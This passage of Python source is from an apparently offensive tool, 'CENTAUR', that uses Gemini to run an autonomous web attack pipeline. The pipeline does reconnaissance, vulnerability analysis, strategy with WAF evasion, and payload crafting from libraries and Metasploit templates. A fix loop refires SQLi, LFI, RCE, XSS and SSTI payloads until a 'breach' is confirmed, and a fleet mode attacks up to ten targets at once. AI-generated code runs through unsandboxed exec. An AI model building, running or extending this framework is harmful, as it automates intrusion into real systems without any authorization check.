                actions = re.findall(r'action=["\']([^"\']+)["\']', res.text, re.IGNORECASE)
                for a in actions[:2]:
                    # Compare the value that is actually stored, otherwise
                    # the same form action is appended again for every page.
                    entry = f"form:{a}"
                    if entry not in self.p.injectable_params:
                        self.p.injectable_params.append(entry)

            # At most one error signature is recorded per path.
            for pattern in self._ERROR_PATTERNS:
                if pattern in body_lower:
                    self.p.error_signatures.append(f"{pattern.upper()} on {path}")
                    break

    async def _measure_baseline(self):
        """Time one request to ``/``; fall back to 1.0 s if it fails."""
        try:
            # perf_counter is monotonic, so the interval cannot go negative
            # or jump when the system clock is adjusted.
            start = time.perf_counter()
            await self.client.get(self._url("/"))
            self.p.response_time_baseline = time.perf_counter() - start
        except Exception:
            self.p.response_time_baseline = 1.0

    async def run(self):
        """Run the full recon sequence and return the populated profile.

        The sequence is best-effort: any exception stops it silently and the
        profile keeps whatever was collected up to that point. The HTTP
        client is always closed.
        """
        await self._detect_protocol()
        try:
            resp = await self.client.get(self._url("/"))
            self.p.is_alive = True
            srv = resp.headers.get("Server", "")
            if srv:
                self.p.server_banner = srv
            self.p.cookies = dict(resp.cookies)
            await self._fingerprint_tech(resp)
            await self._scan_paths()
            await self._measure_baseline()
        except Exception:
            # Deliberate best-effort: an unreachable or misbehaving target
            # simply yields a partially filled profile.
            pass
        finally:
            await self.client.aclose()
        return self.p
# ==============================================================================
# EXPLOIT ENGINE
# ==============================================================================
class ExploitResult:
    """Outcome of a single payload request.

    A new instance represents "nothing happened yet": not successful, status
    code 0, zero response time, empty body, no evidence, no extracted data.
    """

    def __init__(self):
        self.success, self.status_code, self.response_time = False, 0, 0.0
        self.response_body = ""
        self.evidence = list()  # per-instance list of human-readable findings
        self.extracted_data = ""
async def advanced_payload_fire(protocol, host, port, endpoint, payload,
                                baseline=1.0, http_method="GET",
                                inject_in_body=False, content_type=""):
    """
    Send one payload to a target and classify the response heuristically.

    Args:
        protocol, host, port, endpoint: combined into the request URL.
        payload: the string under test. Appended verbatim (no encoding) to
            the URL unless ``inject_in_body`` is true, in which case it is
            sent as the request body.
        baseline: reference response time in seconds; a response slower than
            ``baseline + 4.0`` counts as a time-based hit when the payload
            contains a sleep keyword.
        http_method: GET, POST, PUT or DELETE (case-insensitive); any other
            value falls back to GET.
        inject_in_body: put the payload in the body instead of the URL.
        content_type: optional Content-Type header value.

    Returns:
        An ``ExploitResult``. Errors are never raised to the caller; they are
        recorded in ``result.evidence`` and in ``exploit_logger``.
    """
    result = ExploitResult()
    if inject_in_body:
        url = f"{protocol}://{host}:{port}{endpoint}"
        body = payload
    else:
        url = f"{protocol}://{host}:{port}{endpoint}{payload}"
        body = None
    extra_headers = {}
    if content_type:
        extra_headers["Content-Type"] = content_type
    # Only the first 120 characters of the URL are logged.
    exploit_logger.log("INFO", f"Firing {http_method} payload", {
        "url": url[:120],
        "method": http_method,
        "body_len": len(body) if body else 0,
    })
    start = time.time()
    try:
        # A fresh client is created (and closed) for every call.
        async with httpx.AsyncClient(
            verify=False, timeout=EXPLOIT_TIMEOUT,
            headers={**HTTP_HEADERS, **extra_headers}
        ) as client:
            method_fn = {
                "GET": client.get,
                "POST": client.post,
                "PUT": client.put,
                "DELETE": client.delete,
            }.get(http_method.upper(), client.get)
            # The body is only transmitted for POST/PUT. With any other
            # method and inject_in_body=True the payload is not sent at all.
            if http_method.upper() in ("POST", "PUT") and body:
                resp = await method_fn(url, content=body)
            else:
                resp = await method_fn(url)
            result.response_time = time.time() - start
            result.status_code = resp.status_code
            result.response_body = resp.text[:2000]  # keep at most 2000 chars
            exploit_logger.log("INFO", "Response received", {
                "status": resp.status_code,
                "time": f"{result.response_time:.2f}s",
                "size": len(resp.text),
            })
            # ---- Detection logic ----
            # Every check below is a plain substring test on the response.
            # Any single hit sets result.success; checks are independent and
            # all of them run, so one response can add several evidence lines.
            body_lower = resp.text.lower()
            # File-disclosure markers (case-sensitive match on the raw text).
            # NOTE(review): "uid=", "gid=" and "/bin/bash" also appear in
            # rce_markers below, so the same response is reported under both
            # labels and extracted_data is overwritten by the later check.
            lfi_markers = ["root:x:0:0", "[boot loader]", "[extensions]", "uid=",
                           "gid=", "win.ini", "extension=", "for 16-bit app support",
                           "/bin/bash", "/bin/sh", "nobody:x:"]
            for marker in lfi_markers:
                if marker in resp.text:
                    result.success = True
                    result.evidence.append(f"LFI: '{marker}' found")
                    # Keep the first 15 non-blank lines of the response.
                    lines = [l for l in resp.text.split('\n') if l.strip()][:15]
                    result.extracted_data = '\n'.join(lines)
            # Time-based check: slow response AND a sleep keyword in the payload.
            if (result.response_time > (baseline + 4.0) and
                    any(x in payload.upper() for x in ["SLEEP", "WAITFOR", "PG_SLEEP", "DBMS_PIPE"])):
                result.success = True
                result.evidence.append(f"Time-Based SQLi: {result.response_time:.2f}s delay")
            # Database error strings (matched against the lower-cased body).
            # NOTE(review): bare product names such as "mysql" or "oracle"
            # match any page that merely mentions them — likely false
            # positives; confirm whether that is intended.
            sql_errors = ["sql syntax", "mysql", "postgresql", "sqlite", "oracle",
                          "mssql", "syntax error at", "quoted string not properly terminated",
                          "unclosed quotation", "division by zero", "invalid column"]
            for err in sql_errors:
                if err in body_lower:
                    result.success = True
                    result.evidence.append(f"SQL Error: '{err}'")
            # Command-output markers (case-sensitive match on the raw text).
            # NOTE(review): "#" and "total " occur in ordinary HTML/text, so
            # this check reports success for almost any non-trivial response.
            rce_markers = ["uid=", "gid=", "groups=", "Linux version", "Windows NT",
                           "Microsoft Windows", "drwx", "total ", "/bin/bash",
                           "root@", "#", "SYSTEM", "nt authority"]
            for marker in rce_markers:
                if marker in resp.text:
                    result.success = True
                    result.evidence.append(f"RCE: '{marker}' found")
                    result.extracted_data = resp.text[:800]
            # XML response that also contains "root:" or a DOCTYPE.
            if "<?xml" in resp.text and ("root:" in resp.text or "<!DOCTYPE" in resp.text):
                result.success = True
                result.evidence.append("XXE: XML data leaked")
            # Payload echoed back unchanged, and it contains script/onerror.
            if payload in resp.text and ("<script" in payload.lower() or "onerror" in payload.lower()):
                result.success = True
                result.evidence.append("XSS: Payload reflected")
            # Template probes: the payload contains the probe and the
            # response contains the expected result anywhere in its text.
            ssti_results = {"{{7*7}}": "49", "${7*7}": "49", "#{7*7}": "49"}
            for probe, expected in ssti_results.items():
                if probe in payload and expected in resp.text:
                    result.success = True
                    result.evidence.append(f"SSTI: Expression evaluated to {expected}")
            # Info leaks (non-fatal evidence): recorded without setting success.
            info_leaks = ["database error", "stack trace", "exception",
                          "debug mode", "warning:", "notice:", "fatal error",
                          "traceback", "at line"]
            for leak in info_leaks:
                if leak in body_lower:
                    result.evidence.append(f"Info Leak: '{leak}'")
    except asyncio.TimeoutError:
        # NOTE(review): httpx is documented to raise httpx.TimeoutException
        # for its own timeouts — confirm whether this branch is reachable or
        # whether timeouts currently fall through to the generic handler.
        result.response_time = EXPLOIT_TIMEOUT
        if any(x in payload.upper() for x in ["SLEEP", "WAITFOR", "PG_SLEEP"]):
            result.success = True
            result.evidence.append("Time-Based SQLi: Timeout (likely success)")
    except Exception as e:
        # Best-effort: the error text (first 100 chars) is recorded instead
        # of being raised.
        result.evidence.append(f"Error: {str(e)[:100]}")
        exploit_logger.log("ERROR", f"Execution error: {str(e)[:100]}")
    return result
# ==============================================================================
# PAYLOAD EXECUTION HELPER
# ==============================================================================
def execute_code_template(code: str) -> str:
    """Run a payload code template and return the payload it produces.

    The template's stdout is captured. The first line of what it printed is
    returned; if nothing was printed, the value of a top-level variable named
    ``payload`` is returned instead (converted with ``str``).

    SECURITY: this calls ``exec`` on operator- or AI-supplied source with full
    interpreter privileges and no sandbox. Only run code that has been read.

    Args:
        code: Python source text of the template.

    Returns:
        The derived payload, ``"# Code error: <message>"`` if the template
        raised, or ``""`` if it neither printed anything nor defined
        ``payload``.
    """
    import contextlib
    import io

    captured = io.StringIO()
    # A single dict is used as the execution namespace so the template behaves
    # like a normal module. With separate globals/locals dicts, top-level names
    # (imports, helper functions) are stored in locals and are invisible from
    # inside the template's own functions, which fails with NameError.
    namespace = {}
    try:
        with contextlib.redirect_stdout(captured):
            exec(compile(code, "<payload_code>", "exec"), namespace)
        printed = captured.getvalue().strip()
        if printed:
            return printed.split("\n")[0]
        if "payload" in namespace:
            return str(namespace["payload"])
    except Exception as e:
        return f"# Code error: {e}"
    return ""
# ==============================================================================
# AI AGENT FUNCTIONS (UPGRADED TO GEMINI 2.5)
# ==============================================================================
async def ai_analyze_target(profile: ReconProfile, api_key: str) -> Optional[VulnerabilityAnalysis]:
    """Ask Gemini for a vulnerability assessment of one reconnaissance profile.

    A text prompt is built from the profile's fields and sent to the
    ``gemini-2.5-flash`` model with the Google Search tool enabled. The reply
    is requested as JSON following the ``VulnerabilityAnalysis`` schema and is
    validated into that model.

    Args:
        profile: Reconnaissance data for the target.
        api_key: Gemini API key; a falsy value short-circuits to ``None``.

    Returns:
        The validated ``VulnerabilityAnalysis``, or ``None`` when no API key
        was given or when the request/validation raised (the error is logged).
    """
    if not api_key:
        return None
    # NOTE(review): the client is created outside the try block, so a failure
    # here is not converted into a logged ``None`` result.
    llm = genai.Client(api_key=api_key)
    # Build context with CMS/technology specific CVE search hints
    search_hints = []
    if profile.cms_detected:
        search_hints.append(f"{profile.cms_detected} known CVEs")
    # Only the first three technologies contribute search hints.
    for tech in profile.technologies[:3]:
        search_hints.append(f"{tech} vulnerabilities")
    context = f"""
Analyze this web application target for vulnerabilities:
TARGET: {profile.target_id}
SERVER: {profile.server_banner}
WAF: {profile.waf_detected}
CMS: {profile.cms_detected}
TECHNOLOGIES: {', '.join(profile.technologies)}
INJECTABLE PARAMS: {profile.injectable_params[:10]}
DISCOVERED PATHS: {profile.discovered_paths[:10]}
API ENDPOINTS: {profile.api_endpoints[:10]}
FORMS FOUND: {profile.forms_found[:5]}
ERROR SIGNATURES: {profile.error_signatures[:5]}
SEARCH FOR: Known CVEs and exploits related to: {', '.join(search_hints[:5])}
Provide a detailed vulnerability assessment focusing on the most exploitable attack vectors.
Include any known CVEs that apply to the detected technologies.
Include secondary vulnerabilities to chain.
"""
    try:
        # Enable Google Search grounding
        grounding_tool = types.Tool(google_search=types.GoogleSearch())
        config = types.GenerateContentConfig(
            tools=[grounding_tool],
            response_mime_type="application/json",
            response_json_schema=VulnerabilityAnalysis.model_json_schema()
        )
        resp = await llm.aio.models.generate_content(
            model="gemini-2.5-flash",
            contents=context,
            config=config
        )
        return VulnerabilityAnalysis.model_validate_json(resp.text)
    except Exception as e:
        # Best-effort: any API or validation failure is logged and reported as None.
        exploit_logger.log("ERROR", f"AI Analysis error: {e}")
        return None
async def ai_generate_strategy(profile: ReconProfile, analysis: VulnerabilityAnalysis,
                               api_key: str) -> Optional[AttackStrategy]:
    """Ask Gemini for an attack strategy based on a prior vulnerability analysis.

    Before prompting, ``METASPLOIT_TEMPLATES`` is scanned for a template whose
    name contains the detected CMS or whose CVE field contains one of the
    analysis' related CVEs; a match is passed to the model as a recommendation.

    Args:
        profile: Reconnaissance data for the target.
        analysis: Result of the vulnerability analysis step.
        api_key: Gemini API key.

    Returns:
        The validated ``AttackStrategy``, or ``None`` if the request or
        validation raised (the error is logged).
    """
    llm = genai.Client(api_key=api_key)
    # Check if we have a matching Metasploit template
    matching_template = None
    for template_id, template in METASPLOIT_TEMPLATES.items():
        if profile.cms_detected and profile.cms_detected.lower() in template["name"].lower():
            matching_template = template_id
            break
        for cve in analysis.related_cves:
            if cve in template.get("cve", ""):
                matching_template = template_id
                # NOTE(review): this break only leaves the CVE loop; the outer
                # template loop keeps going, so a later template can replace
                # this match.
                break
    context = f"""
Based on this vulnerability analysis, create a detailed attack strategy:
ANALYSIS:
{analysis.model_dump_json(indent=2)}
TARGET CONTEXT:
- Server: {profile.server_banner}
- WAF: {profile.waf_detected}
- CMS: {profile.cms_detected}
- Technologies: {', '.join(profile.technologies)}
- Available endpoints: {profile.api_endpoints[:5]}
- Forms: {profile.forms_found[:5]}
- Injectable params: {profile.injectable_params[:10]}
METASPLOIT TEMPLATES AVAILABLE:
{json.dumps(METASPLOIT_TEMPLATES, indent=2)}
{"RECOMMENDED TEMPLATE: " + matching_template if matching_template else ""}
Specify whether to use GET or POST. For SQLi/LFI/XSS in form fields use POST.
If a Metasploit template applies, specify it in the metasploit_template field.
Generate a comprehensive attack strategy including WAF evasion techniques.
"""
    try:
        grounding_tool = types.Tool(google_search=types.GoogleSearch())
        config = types.GenerateContentConfig(
            tools=[grounding_tool],
            response_mime_type="application/json",
            response_json_schema=AttackStrategy.model_json_schema()
        )
        resp = await llm.aio.models.generate_content(
            model="gemini-2.5-flash",
            contents=context,
            config=config
        )
        return AttackStrategy.model_validate_json(resp.text)
    except Exception as e:
        # Best-effort: any API or validation failure is logged and reported as None.
        exploit_logger.log("ERROR", f"Strategy generation error: {e}")
        return None
async def ai_craft_payload(strategy: AttackStrategy, profile: ReconProfile,
                           api_key: str) -> Optional[PayloadGeneration]:
    """Ask Gemini to produce a payload (and generator code) for a strategy.

    The prompt combines the strategy, reference payloads taken from
    ``PAYLOAD_LIBRARY`` for the matching vulnerability class, an optional
    Metasploit template named by the strategy, and a base code template chosen
    from ``PAYLOAD_CODE_TEMPLATES``.

    Args:
        strategy: Attack strategy produced by the previous step.
        profile: Reconnaissance data for the target.
        api_key: Gemini API key.

    Returns:
        The validated ``PayloadGeneration``, or ``None`` if the request or
        validation raised (the error is logged).
    """
    llm = genai.Client(api_key=api_key)
    vuln_class = strategy.vulnerability_class
    library_payloads = []
    # Collect up to three payloads per category from every library section
    # whose name overlaps (case-insensitively) with the vulnerability class.
    for vtype, categories in PAYLOAD_LIBRARY.items():
        if vtype.lower() in vuln_class.lower() or vuln_class.lower() in vtype.lower():
            for cat_payloads in categories.values():
                library_payloads.extend(cat_payloads[:3])
    # Get Metasploit template if specified
    metasploit_context = ""
    if strategy.metasploit_template and strategy.metasploit_template in METASPLOIT_TEMPLATES:
        template = METASPLOIT_TEMPLATES[strategy.metasploit_template]
        metasploit_context = f"""
METASPLOIT TEMPLATE TO USE:
{json.dumps(template, indent=2)}
Use this template as the basis for your payload. Adapt it for the target endpoint.
"""
    # Pick the base code template by keyword in the vulnerability class;
    # "Custom" is used when nothing matches.
    template_hint = "Custom"
    if "SQLi" in vuln_class or "SQL" in vuln_class:
        template_hint = "SQLi_TimeBased" if "time" in strategy.strategy.lower() else "SQLi_Union"
    elif "LFI" in vuln_class:
        template_hint = "LFI_Basic"
    elif "RCE" in vuln_class or "Command" in vuln_class:
        template_hint = "RCE_CommandInjection"
    elif "XSS" in vuln_class:
        template_hint = "XSS_Basic"
    elif "SSTI" in vuln_class:
        template_hint = "SSTI_Detection"
    context = f"""
Craft an advanced exploitation payload with Python code:
STRATEGY:
{strategy.model_dump_json(indent=2)}
WAF DETECTED: {profile.waf_detected}
SERVER: {profile.server_banner}
{metasploit_context}
REFERENCE PAYLOADS (use as inspiration, modify for evasion):
{json.dumps(library_payloads[:12], indent=2)}
PYTHON CODE TEMPLATE BASE (extend/modify this):
```python
{PAYLOAD_CODE_TEMPLATES.get(template_hint, PAYLOAD_CODE_TEMPLATES["Custom"])}
```
REQUIREMENTS:
1. Generate the exact payload string ready to fire
2. Provide Python code that generates this payload as a callable function
3. Apply WAF evasion from the strategy
4. Set inject_in_body=True and provide content_type if the attack needs POST body injection
5. Provide 4+ alternative payloads ranked by likelihood of success
6. If using a Metasploit template, adapt it for this specific target
"""
    try:
        grounding_tool = types.Tool(google_search=types.GoogleSearch())
        config = types.GenerateContentConfig(
            tools=[grounding_tool],
            response_mime_type="application/json",
            response_json_schema=PayloadGeneration.model_json_schema()
        )
        resp = await llm.aio.models.generate_content(
            model="gemini-2.5-flash",
            contents=context,
            config=config
        )
        pg = PayloadGeneration.model_validate_json(resp.text)
        # Only the first 80 characters of the payload are written to the log.
        exploit_logger.log("INFO", "AI generated payload", {
            "payload": pg.payload[:80],
            "encoding": pg.encoding,
            "method": pg.http_method,
        })
        return pg
    except Exception as e:
        # Best-effort: any API or validation failure is logged and reported as None.
        exploit_logger.log("ERROR", f"Payload generation error: {e}")
        return None
async def ai_analyze_exploit_result(result: ExploitResult, payload: str,
                                    api_key: str) -> Optional[ExploitAnalysis]:
    """Ask Gemini to interpret the outcome of one payload execution.

    The prompt contains the payload, the status code, response time and
    evidence of ``result``, plus the first 800 characters of the response body
    and the first 400 characters of the extracted data. No search tool is
    attached to this request.

    Args:
        result: Outcome of the payload execution.
        payload: The payload string that was sent.
        api_key: Gemini API key.

    Returns:
        The validated ``ExploitAnalysis``, or ``None`` if the request or
        validation raised (the error is logged).
    """
    llm = genai.Client(api_key=api_key)
    context = f"""
Analyze this exploitation attempt:
PAYLOAD USED: {payload}
RESULTS:
- Status Code: {result.status_code}
- Response Time: {result.response_time}s
- Evidence Found: {result.evidence}
RESPONSE SNIPPET:
{result.response_body[:800]}
EXTRACTED DATA:
{result.extracted_data[:400]}
Determine if the exploit succeeded, what was confirmed, and recommend next escalation steps.
If the exploit failed, provide specific suggestions to fix/improve the payload.
"""
    try:
        config = types.GenerateContentConfig(
            response_mime_type="application/json",
            response_json_schema=ExploitAnalysis.model_json_schema()
        )
        resp = await llm.aio.models.generate_content(
            model="gemini-2.5-flash",
            contents=context,
            config=config
        )
        return ExploitAnalysis.model_validate_json(resp.text)
    except Exception as e:
        # Best-effort: any API or validation failure is logged and reported as None.
        exploit_logger.log("ERROR", f"Exploit analysis error: {e}")
        return None
# ==============================================================================
# AI CODE PATCHING
# ==============================================================================
async def ai_patch_payload_code(current_code: str, user_request: str,
                                context: dict, api_key: str) -> Optional[PayloadPatchResponse]:
    """Ask Gemini to modify payload-generation code according to a request.

    Args:
        current_code: The Python source to be patched.
        user_request: Free-text description of the desired change.
        context: Dict read with ``.get`` for the keys ``target``, ``server``,
            ``waf`` and ``last_result``; missing keys fall back to
            placeholder text in the prompt.
        api_key: Gemini API key.

    Returns:
        The validated ``PayloadPatchResponse``, or ``None`` if the request or
        validation raised (the error is logged).
    """
    llm = genai.Client(api_key=api_key)
    prompt = f"""
You are a penetration testing expert. Patch the following Python payload generation code.
CURRENT CODE:
```python
{current_code}
```
CONTEXT:
- Target: {context.get('target', 'Unknown')}
- Server: {context.get('server', 'Unknown')}
- WAF: {context.get('waf', 'None')}
- Last Result: {context.get('last_result', 'N/A')}
USER REQUEST: {user_request}
INSTRUCTIONS:
1. Modify the code to address the user's request
2. Keep it as executable Python code with functions
3. Add comments explaining changes
4. Ensure the code prints the primary payload as the first line of stdout
Provide patched code and explain what changed.
"""
    try:
        config = types.GenerateContentConfig(
            response_mime_type="application/json",
            response_json_schema=PayloadPatchResponse.model_json_schema()
        )
        resp = await llm.aio.models.generate_content(
            model="gemini-2.5-flash",
            contents=prompt,
            config=config
        )
        patch = PayloadPatchResponse.model_validate_json(resp.text)
        # Only the number of reported changes is logged, not the code itself.
        exploit_logger.log("INFO", "AI patched code", {"changes": len(patch.changes_made)})
        return patch
    except Exception as e:
        # Best-effort: any API or validation failure is logged and reported as None.
        exploit_logger.log("ERROR", f"Code patching failed: {e}")
        return None
# ==============================================================================
# FIX LOOP - Iterative Payload Refinement
# ==============================================================================
async def fix_loop_execute(profile: ReconProfile, strategy: AttackStrategy,
                           initial_payload: PayloadGeneration, api_key: str,
                           max_iterations: int = MAX_FIX_ITERATIONS):
    """Execute a payload and retry with AI-revised payloads until it succeeds.

    Each iteration fires the current payload, asks the model to analyse the
    result, and records a summary. The loop stops on the first success, when
    the analysis offers no fix suggestions, when generating a revised payload
    fails, or after ``max_iterations`` attempts.

    Args:
        profile: Reconnaissance data for the target (protocol, host, port and
            response-time baseline are read).
        strategy: Attack strategy; supplies the target endpoint.
        initial_payload: Payload used for the first attempt.
        api_key: Gemini API key.
        max_iterations: Upper bound on attempts.

    Returns:
        A ``(result, iteration_results)`` tuple: the result of the last
        attempt and one summary dict per attempt (keys ``iteration``,
        ``payload``, ``success``, ``evidence``, ``analysis``).
    """
    # NOTE(review): if max_iterations is below 1 the loop body never runs and
    # the final ``return result, ...`` raises UnboundLocalError.
    exploit_logger.log("INFO", f"Starting fix loop with max {max_iterations} iterations")
    current_payload = initial_payload
    iteration_results = []
    for iteration in range(max_iterations):
        exploit_logger.log("INFO", f"Fix loop iteration {iteration + 1}/{max_iterations}")
        # Fire the payload
        result = await advanced_payload_fire(
            profile.protocol, profile.host, profile.port,
            strategy.target_endpoint,
            current_payload.payload,
            profile.response_time_baseline,
            http_method=current_payload.http_method,
            inject_in_body=current_payload.inject_in_body,
            content_type=current_payload.content_type,
        )
        # Analyze the result
        analysis = await ai_analyze_exploit_result(result, current_payload.payload, api_key)
        # The recorded payload is truncated to its first 100 characters.
        iteration_results.append({
            "iteration": iteration + 1,
            "payload": current_payload.payload[:100],
            "success": result.success,
            "evidence": result.evidence,
            "analysis": analysis.model_dump() if analysis else None
        })
        # If successful, we're done
        if result.success:
            exploit_logger.log("INFO", f"Fix loop succeeded on iteration {iteration + 1}")
            return result, iteration_results
        # If we have fix suggestions and haven't hit max iterations, try to fix
        if analysis and analysis.fix_suggestions and iteration < max_iterations - 1:
            exploit_logger.log("INFO", f"Attempting to fix payload based on suggestions")
            # Generate improved payload based on suggestions
            fix_context = f"""
Previous payload failed. Apply these fixes:
{', '.join(analysis.fix_suggestions)}
Original strategy:
{strategy.model_dump_json(indent=2)}
Last result:
- Status: {result.status_code}
- Evidence: {result.evidence}
- Response: {result.response_body[:200]}
Generate an improved payload that addresses the failure.
"""
            try:
                llm = genai.Client(api_key=api_key)
                config = types.GenerateContentConfig(
                    response_mime_type="application/json",
                    response_json_schema=PayloadGeneration.model_json_schema()
                )
                resp = await llm.aio.models.generate_content(
                    model="gemini-2.5-flash",
                    contents=fix_context,
                    config=config
                )
                # The revised payload replaces the current one for the next attempt.
                current_payload = PayloadGeneration.model_validate_json(resp.text)
                exploit_logger.log("INFO", f"Generated new payload: {current_payload.payload[:80]}")
            except Exception as e:
                # Without a revised payload there is nothing new to try.
                exploit_logger.log("ERROR", f"Failed to generate fix: {e}")
                break
        else:
            # No more suggestions or max iterations reached
            break
    exploit_logger.log("INFO", f"Fix loop completed after {len(iteration_results)} iterations")
    return result, iteration_results
# ==============================================================================
# WAR ROOM AGENT
# ==============================================================================
async def centaur_chat_agent(user_msg, chat_history, target_id, state,
                             current_ep, current_pl, current_code, http_method, api_key):
    """Handle one operator chat message and update the editor fields.

    The operator's message, the selected target's reconnaissance data, the
    current editor contents and the last five arsenal entries are sent to the
    model, which answers with a ``CentaurChatResponse``. The exchange is
    appended to the chat history as ``{"role", "content"}`` dicts and the
    suggestion is recorded in ``state["arsenal"]``.

    Args:
        user_msg: Operator's message text.
        chat_history: Existing chat messages, or a falsy value for none.
        target_id: Key of the selected target in ``state["profiles"]``.
        state: Shared state dict with ``"profiles"`` and ``"arsenal"``.
        current_ep: Current endpoint field value.
        current_pl: Current payload field value.
        current_code: Current code editor contents.
        http_method: Currently selected HTTP method.
        api_key: Gemini API key.

    Returns:
        ``(chat_history, endpoint, payload, code, http_method, state)``. The
        middle four values are the model's suggestions on success and the
        unchanged inputs when the key/target is missing or the call failed.
    """
    chat_history = chat_history or []
    if not api_key or not target_id:
        chat_history.append({"role": "user", "content": user_msg})
        chat_history.append({"role": "assistant", "content": "🔴 Missing API Key or Target Selection."})
        return chat_history, current_ep, current_pl, current_code, http_method, state
    llm = genai.Client(api_key=api_key)
    # NOTE(review): this lookup is outside the try block, so a target_id that
    # is not in state["profiles"] raises KeyError to the caller.
    p = state["profiles"][target_id]
    recent_arsenal = state["arsenal"][target_id][-5:] if target_id in state["arsenal"] else []
    context = f"""
You are CENTAUR, an elite Red Team AI assistant specialising in web application security.
TARGET INTELLIGENCE:
- ID: {target_id}
- Server: {p.server_banner}
- WAF: {p.waf_detected}
- CMS: {p.cms_detected}
- Technologies: {', '.join(p.technologies)}
- Discovered Paths: {p.discovered_paths[:10]}
- API Endpoints: {p.api_endpoints[:10]}
- Forms: {p.forms_found[:5]}
- Injectable Params: {p.injectable_params[:10]}
- Error Signatures: {p.error_signatures[:5]}
- Response Baseline: {p.response_time_baseline:.2f}s
CURRENT STATE:
HTTP Method: {http_method}
Endpoint: {current_ep}
Payload: {current_pl}
CURRENT CODE:
```python
{current_code}
```
RECENT ATTEMPTS:
{json.dumps(recent_arsenal, indent=2)}
OPERATOR REQUEST: {user_msg}
INSTRUCTIONS:
1. Analyse the request using all available intelligence
2. Update endpoint, payload, code, and HTTP method as needed
3. Provide expert technical guidance with specific references to recon data
4. Explain evasion techniques clearly
5. Return http_method as GET or POST based on the best attack approach
"""
    try:
        config = types.GenerateContentConfig(
            response_mime_type="application/json",
            response_json_schema=CentaurChatResponse.model_json_schema()
        )
        resp = await llm.aio.models.generate_content(
            model="gemini-2.5-flash",
            contents=context,
            config=config
        )
        data = CentaurChatResponse.model_validate_json(resp.text)
        formatted_reply = f"**{data.chat_reply}**\n\n📋 Technical Analysis:\n{data.technical_analysis}"
        chat_history.append({"role": "user", "content": user_msg})
        chat_history.append({"role": "assistant", "content": formatted_reply})
        # Record the suggestion in the target's arsenal history.
        state["arsenal"][target_id].append({
            "Timestamp": datetime.now().strftime("%H:%M:%S"),
            "Method": data.http_method,
            "Endpoint": data.suggested_endpoint,
            "Payload": data.suggested_payload,
            "Status": "🤖 AI Generated",
            "Notes": f"From: {user_msg[:50]}...",
        })
        return (chat_history, data.suggested_endpoint, data.suggested_payload,
                data.suggested_code, data.http_method, state)
    except Exception as e:
        # On failure the error is shown in the chat and the editor fields are
        # returned unchanged.
        exploit_logger.log("ERROR", f"Chat agent failed: {e}")
        chat_history.append({"role": "user", "content": user_msg})
        chat_history.append({"role": "assistant", "content": f"⚠️ Agent Error: {str(e)}"})
        return chat_history, current_ep, current_pl, current_code, http_method, state
# ==============================================================================
# AUTONOMOUS FLEET
# ==============================================================================
async def run_autonomous_fleet(selected, api_key, state):
    """Run the analysis → strategy → payload → fix-loop pipeline per target.

    At most the first 10 entries of ``selected`` are processed, concurrently.
    Every target yields exactly one report row with the same set of columns,
    whether it completed, stopped at an early phase, or raised.

    Args:
        selected: Target ids (keys of ``state["profiles"]``).
        api_key: Gemini API key.
        state: Shared state dict with ``"profiles"`` and ``"arsenal"``;
            confirmed results are appended to ``state["arsenal"][tid]``.

    Returns:
        ``(summary_markdown, html_table, detailed_logs)``. When the key or the
        selection is missing, an error message, ``""`` and ``[]``.
    """
    if not api_key or not selected:
        return "🔴 Deployment Error: Select targets and provide API Key.", "", []

    detailed_logs = []

    def failed_row(tid, evidence):
        # Same columns as a completed run, so the summary can always read the
        # "Vulnerability" and "Attempts" columns even if every target failed.
        return {"Target": tid, "Vulnerability": "Error", "Confidence": "N/A",
                "Method": "N/A", "Payload": "N/A", "Status": "❌ Failed",
                "Evidence": evidence, "HTTP": 0, "Attempts": 0}

    async def attack_sequence(tid):
        log = [f"🎯 Target: {tid}"]

        def abort(details):
            # Keep the partial log of a run that stopped at an early phase.
            log.append(f"❌ {details}")
            detailed_logs.append("\n".join(log))
            return failed_row(tid, details)

        try:
            # Looked up inside the try so that one unknown target id produces
            # a failed row instead of aborting the whole gather().
            p = state["profiles"][tid]
            log.append(f"📡 Recon: {len(p.discovered_paths)} paths, {len(p.api_endpoints)} APIs")

            log.append("🧠 Phase 1: AI Vulnerability Analysis (with Google Search)...")
            analysis = await ai_analyze_target(p, api_key)
            if not analysis:
                return abort("AI analysis failed")
            log.append(f" └─ {analysis.vulnerability_type} ({analysis.confidence})")
            log.append(f" └─ {analysis.reasoning[:100]}...")
            if analysis.related_cves:
                log.append(f" └─ CVEs: {', '.join(analysis.related_cves[:3])}")

            log.append("🎮 Phase 2: Attack Strategy Generation...")
            strategy = await ai_generate_strategy(p, analysis, api_key)
            if not strategy:
                return abort("Strategy failed")
            log.append(f" └─ Attack: {strategy.vulnerability_class} via {strategy.http_method}")
            log.append(f" └─ Endpoint: {strategy.target_endpoint}")
            log.append(f" └─ Evasion: {', '.join(strategy.evasion_techniques[:3])}")
            if strategy.metasploit_template:
                log.append(f" └─ Metasploit: {strategy.metasploit_template}")

            log.append("⚔️ Phase 3: Payload Generation...")
            payload_gen = await ai_craft_payload(strategy, p, api_key)
            if not payload_gen:
                return abort("Payload gen failed")
            log.append(f" └─ Payload: {payload_gen.payload[:80]}...")
            log.append(f" └─ Encoding: {payload_gen.encoding}")

            # The attempt limit is the fix loop's default, not a fixed "3".
            log.append(f"🔄 Phase 4: Fix Loop Execution (up to {MAX_FIX_ITERATIONS} attempts)...")
            final_result, iterations = await fix_loop_execute(p, strategy, payload_gen, api_key)
            for iter_data in iterations:
                outcome = '✅ Success' if iter_data['success'] else '❌ Failed'
                log.append(f" └─ Attempt {iter_data['iteration']}: {outcome}")
                log.append(f" Evidence: {', '.join(iter_data['evidence'][:2])}")

            if final_result.success:
                log.append("🎊 Phase 5: Breach Confirmed!")
                log.append(f" └─ Confirmed: {analysis.vulnerability_type}")
                log.append(f" └─ Evidence: {', '.join(final_result.evidence[:3])}")
                # NOTE(review): this records the initial payload; when the fix
                # loop revised it, the payload that actually succeeded is only
                # available (truncated) in ``iterations``.
                state["arsenal"][tid].append({
                    "Timestamp": datetime.now().strftime("%H:%M:%S"),
                    "Method": payload_gen.http_method,
                    "Endpoint": strategy.target_endpoint,
                    "Payload": payload_gen.payload,
                    "Code": payload_gen.code_template,
                    "Status": "✅ BREACH CONFIRMED",
                    "Notes": f"{analysis.vulnerability_type} | {', '.join(final_result.evidence[:2])} | {len(iterations)} attempts",
                })

            detailed_logs.append("\n".join(log))
            return {
                "Target": tid,
                "Vulnerability": analysis.vulnerability_type,
                "Confidence": analysis.confidence,
                "Method": payload_gen.http_method,
